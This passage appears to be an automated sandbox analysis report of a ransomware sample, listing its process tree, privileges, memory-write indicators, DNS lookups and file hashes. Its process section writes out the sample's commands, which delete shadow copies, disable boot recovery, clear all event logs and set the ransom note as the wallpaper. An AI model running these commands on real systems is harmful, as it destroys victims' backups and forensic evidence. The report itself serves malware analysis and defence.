Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2008 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2952 wrote to memory of 1200 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2952 wrote to memory of 1200 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4788 wrote to memory of 4348 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4788 wrote to memory of 4348 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3468 wrote to memory of 1172 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3468 wrote to memory of 1172 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4468 wrote to memory of 5116 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4468 wrote to memory of 5116 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4764 wrote to memory of 4024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4764 wrote to memory of 4024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2008 wrote to memory of 35880 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2008 wrote to memory of 35880 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 35880 wrote to memory of 36176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 35880 wrote to memory of 36176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 35880 wrote to memory of 36604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 35880 wrote to memory of 36604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe

"C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\6581503.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp

Files

C:\GET_YOUR_FILES_BACK.txt

MD5 b69a0aa7abf916a5f00d0f438cf98fa6
SHA1 1ad8aec6b066487d69492225bb6493b4afd2db64
SHA256 9a3b665f5458ade3c61be4fd2f906a915f8c523127be7456a6bff3677356289d
SHA512 cec0c8f59d7c204f33452223b0f9eaa55bc0ef07f983c42fbdd3ff0906814bf907816bd6b4dd2dbb3292f6396f22b50b0736caf469f1a942fdd7cd09c099cd72

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ua50kyu.uww.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6c9d692ed2826ecb12c09356e69cc09
SHA1 def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256 a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00